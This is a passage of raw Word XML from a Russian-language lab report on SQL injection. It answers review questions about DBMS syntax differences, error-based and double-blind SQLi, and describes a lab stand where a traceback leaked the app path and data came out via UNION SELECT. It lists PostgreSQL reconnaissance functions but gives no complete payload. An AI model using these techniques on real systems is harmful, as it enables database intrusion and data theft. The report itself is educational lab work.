      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403D5999" w14:textId="121B3FA0"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 xml:space="preserve">Для эксплуатации недостаточно только наличия кавычки в пользовательском вводе. Нужно, чтобы ввод попал в SQL-запрос в синтаксически значимом </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>месте</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> и чтобы у атакующего был канал наблюдения результата. В выполненной работе таким каналом стал ответ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Login</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successful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">, в который </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> включал объект </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>RealDictRow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">. Благодаря этому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стала не слепой, а напрямую выводящей данные.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1FC8EE" w14:textId="77777777" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="000639B9" w:rsidP="000639B9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206C100E" w14:textId="21A8A78C" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="00572DB0" w:rsidP="000639B9">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc229005059"/>
      <w:r>
        <w:t xml:space="preserve">Как различия синтаксиса различных СУБД влияют на технику </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>? Почему различия синтаксиса возможны для злоумышленника</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="0E7467D4" w14:textId="3A649FA9" w:rsidR="00823929" w:rsidRDefault="00823929" w:rsidP="000639B9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Разные СУБД используют разные функции, системные каталоги, операторы конкатенации, комментарии, ограничения LIMIT/OFFSET и функции времени. Злоумышленник может определить СУБД по ошибкам, заголовкам, поведению пробных </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>payload-ов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> или особенностям ответа</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414DFB9F" w14:textId="60FFCB72" w:rsidR="00CA1A0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В ходе работы это проявилось в двух местах. Во</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>первых</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для</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostgreSQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>использовались</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системные</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функции</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и</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представления</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>version(</w:t>
      </w:r>
      <w:proofErr w:type="gram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current_database</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current_user</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current_schema</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pg_stat_activity</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current_setting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>max_connections</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 xml:space="preserve">Во-вторых, ошибка </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>datetime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>unknown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">) показала, что SQL-код, характерный для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SQLite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">, не исполняется в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">. Следовательно, успешная эксплуатация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часто требует адаптации </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>payload-ов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> под конкретную СУБД.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710731D6" w14:textId="77777777" w:rsidR="00823929" w:rsidRDefault="00823929" w:rsidP="000639B9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22BFD8C7" w14:textId="1DABAEEF" w:rsidR="00823929" w:rsidRPr="00CC526A" w:rsidRDefault="00823929" w:rsidP="00823929">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc229005060"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Зачем злоумышленниками применяются инъекции типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>error-based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC526A">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="34EC1CF1" w14:textId="502CB0BA" w:rsidR="00823929" w:rsidRDefault="00823929" w:rsidP="00823929">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Error-based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> используется для извлечения информации через сообщения об ошибках. Ошибки могут раскрывать текст SQL-запроса, названия таблиц, типы колонок, используемую СУБД и иногда значения данных</w:t>
      </w:r>
      <w:r w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D84A104" w14:textId="13910CFF" w:rsidR="00CA1A09" w:rsidRDefault="00CA1A09" w:rsidP="00823929">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Error-based</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может быть первым этапом разведки. Даже если через ошибку не удается получить сами данные, она помогает определить структуру запроса, количество колонок, используемый драйвер, тип СУБД и место уязвимости в коде. В лабораторной работе </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>traceback</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Werkzeug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> раскрыл путь /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>/app.py, строку формирования SQL-запроса и использование psycopg2, что резко упростило дальнейшую эксплуатацию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C63D36" w14:textId="77777777" w:rsidR="00823929" w:rsidRPr="000639B9" w:rsidRDefault="00823929" w:rsidP="00823929">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A0C3842" w14:textId="1F089FB2" w:rsidR="00823929" w:rsidRPr="00CC526A" w:rsidRDefault="00823929" w:rsidP="00823929">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc229005061"/>
      <w:r>
        <w:t>В чем заключается техника двойной слепой (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>double-blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC526A">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="61D700AF" w14:textId="3EAC473D" w:rsidR="00823929" w:rsidRDefault="00823929" w:rsidP="00823929">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">При слепой </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> приложение не возвращает данные напрямую. При </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>double-blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> вариантах злоумышленник может не видеть ни явных ошибок, ни непосредственных различий в ответе и вынужден использовать косвенные каналы: временные задержки, изменение поведения приложения или внешние </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>band</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>-вызовы</w:t>
      </w:r>
      <w:r w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7235B644" w14:textId="24128D5E" w:rsidR="00CA1A09" w:rsidRPr="000639B9" w:rsidRDefault="00CA1A09" w:rsidP="00823929">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Double-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>blind</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особенно сложна тем, что атакующий не получает прямого значения данных и не видит явных SQL-ошибок. В таких условиях приходится строить серию проверок, каждая из которых отвечает только на один косвенный вопрос: истинно ли условие, изменилась ли задержка, произошел ли внешний DNS/HTTP-запрос. В выполненной работе такая техника не потребовалась, потому что стенд возвращал ошибки и позволял выводить данные через UNION SELECT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2537AC84" w14:textId="2A976E6F" w:rsidR="009D3CCE" w:rsidRDefault="009D3CCE" w:rsidP="000639B9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E2019E" w14:textId="6E31CD9B" w:rsidR="00C53ADA" w:rsidRDefault="00C53ADA" w:rsidP="00830F2D">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:keepNext/>
